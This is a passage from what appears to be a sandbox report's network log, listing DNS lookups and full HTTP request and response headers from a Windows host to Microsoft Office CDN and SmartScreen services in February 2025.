                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=42, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/officestartbundles/pwa-bootstrap.303ab5137e5e401578e9.js
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/officestartbundles/pwa-bootstrap.303ab5137e5e401578e9.js HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: */*
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                last-modified: Wed, 05 Feb 2025 12:02:39 GMT
                x-ms-request-id: 7432d98c-d01e-000f-111d-7989fb000000
                content-encoding: gzip
                content-length: 26965
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139734288,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef710&TotalRTCDNTime=42&CompressionType=gzip&FileSize=26965"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=42, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                content-type: application/javascript
                x-cdn-provider: Akamai
              • flag-us
                DNS
                nav.smartscreen.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                nav.smartscreen.microsoft.com
                IN A
                Response
                nav.smartscreen.microsoft.com
                IN CNAME
                prod-atm-wds-nav.trafficmanager.net
                prod-atm-wds-nav.trafficmanager.net
                IN CNAME
                prod-agic-us-2.uksouth.cloudapp.azure.com
                prod-agic-us-2.uksouth.cloudapp.azure.com
                IN A
                172.165.69.228
              • flag-us
                DNS
                nav.smartscreen.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                nav.smartscreen.microsoft.com
                IN A
              • flag-gb
                POST
                https://nav.smartscreen.microsoft.com/windows/browser/edge/service/navigate/4
                Remote address:
                172.165.69.228:443
                Request
                POST /windows/browser/edge/service/navigate/4 HTTP/2.0
                host: nav.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoidzB0cFFqT2JGdFk9Iiwia2V5IjoiU1IvaGxzNjlxVWs3SnhOUzVWaFk4UT09In0=
                content-length: 1875
                content-type: application/json; charset=utf-8
                cache-control: no-cache
                Response
                HTTP/2.0 200
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-type: application/json; charset=utf-8
                content-length: 1052
                server: Kestrel
                cache-control: max-age=0, private
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
              • flag-gb
                POST
                https://nav.smartscreen.microsoft.com/windows/browser/edge/actions
                Remote address:
                172.165.69.228:443
                Request
                POST /windows/browser/edge/actions HTTP/2.0
                host: nav.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoiWENWdDlUVFFZTGs9Iiwia2V5IjoiVm5HVlJVMSs3NnF2Uml6ejJTb3dRZz09In0=
                content-length: 1460
                content-type: application/json; charset=utf-8
                cache-control: no-cache
                Response
                HTTP/2.0 200
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-type: application/json; charset=utf-8
                content-length: 704
                server: Kestrel
                cache-control: max-age=0, private
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
              • flag-us
                DNS
                data-edge.smartscreen.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                data-edge.smartscreen.microsoft.com
                IN A
                Response
                data-edge.smartscreen.microsoft.com
                IN CNAME
                prod-atm-wds-edge.trafficmanager.net
                prod-atm-wds-edge.trafficmanager.net
                IN CNAME
                prod-agic-us-3.uksouth.cloudapp.azure.com
                prod-agic-us-3.uksouth.cloudapp.azure.com
                IN A
                172.165.61.93
              • flag-gb
                GET
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "636637214778466256.rel.v2"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 200
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-type: application/octet-stream
                content-length: 57
                server: Kestrel
                cache-control: max-age=86400
                etag: "638343870221005468"
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
                x-oi-signature: v=1; a=sha384RSA; ha=SHA384; bh=j4KrExT8d8Sta+9XdhCezD7hBBI07nd+3ZBLADaghRr4d/09v4f5U/qTjaOMrTCA; b=lsxejbsmixGwcuFeAOZKmpd1SHTEllQasQG2+/CD0NsAyZxEvj92iSXg4oIFBkMR6T5zGsr6fweTH5vZVeI6ucDD38nLM9KMrq5eRa9TryJWqO+IbvAljMHNXvAljPK2LeRsDTWYDgopZyWBvWkXXjA1SYiG1lcZjqGoeYE3RGB1av+gzIm0UtuS6l4lOPKBfqrbhng5p43VJZlfWnRtpUA6WIQlA77TnCYXYS+4qby6/glkxz/n6Kqj2AdZiBom/dT2adpHR7dqyW17hHIDaB6CYkxr/l3tputKOQWMABAZujw6r0VSf1RPj+lK+udHaMb0ncnK76ykfpMb9T1YBA==; fp=37DBD367E84BB5891D0C8F421BAE3393C75DF49C; h=CACHE-CONTROL:ETAG;
                x-oi-cert: MIIIsgYJKoZIhvcNAQcCoIIIozCCCJ8CAQExADAPBgkqhkiG9w0BBwGgAgQAoIIIgzCCCH8wggZnoAMCAQICEzMAZA/bZ2MnRmHFGGYAAABkD9swDQYJKoZIhvcNAQEMBQAwXTELMAkGA1UEBhMCVVMxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEuMCwGA1UEAxMlTWljcm9zb2Z0IEF6dXJlIFJTQSBUTFMgSXNzdWluZyBDQSAwMzAeFw0yNDA2MTgwNjM2MDZaFw0yNTA2MTMwNjM2MDZaMHMxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQDExxjb250ZW50LnNtYXJ0c2NyZWVuLm1zZnQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzSkQH8K/WmXFFOfz8yP+NDIscpRldMgdHZ/Kc816gbCpEP+JEDiY4fA5GNEIbjnvfJxC6LS2f9f0q2Vv3v71yMOrA5w+sy4xgZROMqneRk4OOdRpkAS7/3Fg4HC0vx9ShdXcPpReU/FjIW0qpT6wydh41qsQXlitOZCmEFUrwaZWVpMFiZ1NElT6U6wH0ZH9atQMkkpoTb9Y9bROgctEnT8Iq9Isfe36cpLL5CVekqtCQ4EkiCyZnnKTEZZ8Frx0/Sa+UAivfNwojP0hVjIuTXffBgp04oENcLI8TIWSrqy6dGs0NKKqfYjX3aC9wG4f5KuYVAHgvNqtPOyvnYIrQIDAQABo4IEIDCCBBwwggGABgorBgEEAdZ5AgQCBIIBcASCAWwBagB2AE51oydcmhDDOFts1N8/Uusd8OCOG41pwLH6ZLFimjnfAAABkCoYiY8AAAQDAEcwRQIgAdMMTb63gVYnA93mpW7SmMwqAZWx96ueTYwL6TehoBECIQDgkkNU+beS5FjNaivae5pgzvpfrYx0JJqV8rWCEXesOAB3AH1ZHhLheCp7HGFnfF79+NCHXBSgTpWeuQMv2Q6MLnm4AAABkCoYjA0AAAQDAEgwRgIhALuO/1PINtm1k6b1daoCuuaestz02CkQKf6HQ9v6a3UsAiEA2i/FtCybsSHYT5L6/qRDeoGDOgZUdwCjapONqMODHhMAdwDgkrP8DB3I52g2H95huZZNClJ4GYpy1nLEsE2lbW9UBAAAAZAqGIoQAAAEAwBIMEYCIQDxvx82pdAiRUD2+wC7nQfGjs3X1Q1Vfo12nl9h9jR9QwIhAIuN6A84evReztCG1eEZmf4BDesaQDgjPt0Dx2GVga2iMCcGCSsGAQQBgjcVCgQaMBgwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEwPAYJKwYBBAGCNxUHBC8wLQYlKwYBBAGCNxUIh73XG4Hn60aCgZ0ujtAMh/DaHV2ChOVpgvOnPgIBZAIBJjCBtAYIKwYBBQUHAQEEgacwgaQwcwYIKwYBBQUHMAKGZ2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwQXp1cmUlMjBSU0ElMjBUTFMlMjBJc3N1aW5nJTIwQ0ElMjAwMyUyMC0lMjB4c2lnbi5jcnQwLQYIKwYBBQUHMAGGIWh0dHA6Ly9vbmVvY3NwLm1pY3Jvc29mdC5jb20vb2NzcDAdBgNVHQ4EFgQUmS0vRaxdPTaVZEkUoU59i8aa+iIwDgYDVR0PAQH/BAQDAgWgMCcGA1UdEQQgMB6CHGNvbnRlbnQuc21hcnRzY3JlZW4ubXNmdC5uZXQwDAYDVR0TAQH/BAIwADBqBgNVHR8EYzBhMF+gXaBbhllodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBBenVyZSUyMFJTQSUyMFRMUyUyMElzc3VpbmclMjBDQSUyMDAzLmNybDBmBgNVHSAEXzBdMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5odG0wCAYGZ4EMAQICMB8GA1UdIwQYMBaAFP4JcUBVBRBE2KSBdbieGulKBojIMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATANBgkqhkiG9w0BAQwFAAOCAgEAe1QltG1CI1df9IjK1nJmDNk2IFLlAW9EAV78FbEhTeVYqvAiIlJAZL8lV69JbhjFOqrf4kI8K56Uy16JKHBh3ZVK9Sm2IjOYetFaWXEgr1CH0PRs9iSa93kqsCUwgFL8eOgQ2/4nlWyNzvJbWchTs52KcBHkR6QentlCaEYALNYI0E2uBPj9/5C0djhVZVaOngEM5Wv6XPdh6d3Oy0iwReCKoNVHHr1eT5dWC7R84uftsGYAgWiTMzAGX2gihswe10uDjS0F0KSHPUtaHo3iT68fgESlBSrdKNbutOl94eP2uhRxRr3aB+Sn5jUM/miiRPKBE+rDOHF/g1YQEXzmgm4G0EyItS9MJZ4mrwRaV4vpdcjZuQz3ymmMN6swnRTsXrOuOlP9QU/WhGVimpclYVPusGGi3Z65kSq55yOVyV15m3G+v2bBh+lM6jMLuCcnQeuFGI36+t1NFAvTS/AU6dfY7X93Xqc7yCBBgqliB5nefi30aW8AHA2dVKdti7v9w1S6SdPHEk/IbT2WUS8cVaS9gNtZNjQuL/FjrogLrr3BeXZpsBYZCxCa1f0ksMOboOmngZ3YMn9n57J19dZq7oqUkV5uoiv++qxOM3etzptUD9cEhMjLet0DWAof34ieFziSnUOKhoIZNwfSDnhAiGRl3ytKrZJMc8DYtZvak94xAA==
              • flag-gb
                GET
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "170540185939602997400506234197983529371"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 200
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-type: application/octet-stream
                content-length: 82786
                server: Kestrel
                cache-control: max-age=86400
                etag: "300161259571223429446516194326035503227.rel.v2"
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
                x-oi-signature: v=1; a=sha384RSA; ha=SHA384; bh=0PQHIc3AS/oVTVZALWdbbJUL/xHaAXSZ10C6EJH61QC6j1BTRJrE8FaLzf6rrCEO; b=Dj97Kk24biQZcGNCbQwLuk7ddS8Ms6mdjqbWDRu/xYtTggzRn64t9QeeT4noSzVLgO3Q8PVS/r+FIdP8p3ZZDdt8fX4Wy6kBI6zEVzH0cwtQn8sIAohJpy4k74plt90dZN4qgJ/55wDDF43E4S7gsoX8/0d2qojXALNG5uFWPVYAuP/DaSBn0Y2aweWzMe/KC92r6t48hu2RTqazNwbs2TwFIVViW1uhL6E2aIzRgyc+qyp8gIqXuWrgpPBreOItUJt4/rHt1bdsZcP8Ni5vxsx47WIcRqiuoaUyb0OuzpfOgp0U7wK4W6erbFMq3uALaapSxC9ZyZMiS3KDkSPcHw==; fp=37DBD367E84BB5891D0C8F421BAE3393C75DF49C; h=CACHE-CONTROL:ETAG;
                x-oi-cert: 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
              • flag-gb
                GET
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/script/2?pushCert=false
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/script/2?pushCert=false HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "288225407871007797721230069131519167447.rel.v2"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 200
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-type: application/octet-stream
                content-length: 460992
                server: Kestrel
                cache-control: max-age=86400
                etag: "638004170464094982"
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
                x-oi-signature: v=1; a=sha384RSA; ha=SHA384; bh=7csvs6wrK3NA5rU73eamx5vAWfaIbGGGGrCaQymgYIKtYElVZVn8FMwEOPvCPHsR; b=iLJvug2xVRHV/zRkTuEyY8Zm5DV1r2rcoFmtOqM4Th8e1UGMuxxCMsEl3V0m2DZ1ibIhJJXHkKq6VicNjkeGtE2XNLuXUg4Nt1+9AjYEtAzZZmF4g52u81VFXkPXAYwDAkuaWGEU1H35w7fv6AlvtPAdSa2GidI4us0RI8m8w0emxetz7h12azENRS2EkL1SmLqM1QA6gpadyCfwnzLR9jRyPC4iCtc4/Pk8DdunPJ80tS/A9XRjUXiBanugKBbt7rxXgPMKd/53Lx1dNJWhhRZdrIb1nui9Uz0C6J98qUNgxElxK1ih7UYNKU4qSWoO4vL6jWtpd+QWlKRX3g2gvQ==; fp=37DBD367E84BB5891D0C8F421BAE3393C75DF49C; h=CACHE-CONTROL:ETAG;
                x-oi-cert: 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
              • flag-gb
                GET
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "638343870221005468"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 304
                date: Tue, 11 Feb 2025 16:57:46 GMT
                content-length: 0
                server: Kestrel
                cache-control: max-age=86400
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
              • flag-gb
                GET
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/script/2?pushCert=false
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/script/2?pushCert=false HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "300161259571223429446516194326035503227.rel.v2"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 304
                date: Tue, 11 Feb 2025 16:57:47 GMT
                content-length: 0
                server: Kestrel
                cache-control: max-age=86400
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
              • flag-gb
                GET
